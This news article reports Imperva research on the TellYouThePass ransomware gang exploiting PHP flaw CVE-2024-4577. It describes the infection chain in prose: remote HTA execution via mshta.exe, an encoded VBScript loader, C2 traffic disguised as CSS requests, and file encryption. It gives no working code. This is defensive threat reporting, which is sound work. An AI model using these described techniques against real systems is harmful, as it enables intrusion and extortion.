‘TellYouThePass’ Gang Exploits Recent PHP RCE Flaw to Distribute Ransomware

Written by Lore Apostol
Published on June 12, 2024

Imperva Threat Research reported detecting attacker activity leveraging new PHP vulnerability CVE-2024-4577 to deliver malware starting on June 8, which the researchers have attributed to the ‘TellYouThePass’ ransomware campaign. Other attacks exploiting this vulnerability include WebShell uploads and ransomware deployment attempts. A fix for the known exploit for CVE-2024-4577 is already available.

This critical RCE flaw permitted the threat actors to execute arbitrary PHP code on the target system and run a malicious HTML Application (HTA) file hosted on an attacker-controlled Web server via mshta.exe, a native Windows binary able to execute remote payloads.

The initial infection uses an HTA file (dd3.hta) containing a malicious VBScript with a long base64-encoded string. The decoding reveals bytes of a binary, which are loaded into memory during runtime. 

TellYouThePass Ransomware Code
Image Source: Imperva

Recently, ‘TellYouThePass’ variants have been observed in the form of .NET samples distributed via HTML applications, and the ‘mshta’ executable holds a .NET variant of the ‘TellYouThePass’ ransomware.

The sample analyzed by the researchers in this report sends an HTTP request to the command-and-control (C2) server containing notification of infection and data about the infected machine parading as a request to retrieve CSS resources.

The binary then enumerates directories, kills processes, generates encryption keys, and encrypts files, then publishes a ReadMe message containing the ransomware conditions in the web root directory.

A report from Censys says more than 450,000 exposed PHP servers, predominantly in the U.S. and Germany, could be vulnerable to this flaw.

‘TellYouThePass’ has been known since 2019, and the group has been targeting both enterprises and private environments via Windows and Linux systems, usually exploiting CVE-2021-44228 (Apache Log4j) and CVE-2023-46604, among others. 

Ransomware attacks are still seen in high numbers. The latest incidents that made the news were the targeting of U.S. education and recreation sectors, BianLian’s attack on Australia’s Northern Minerals, and the disruption of Seattle Public Library’s activity.

For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: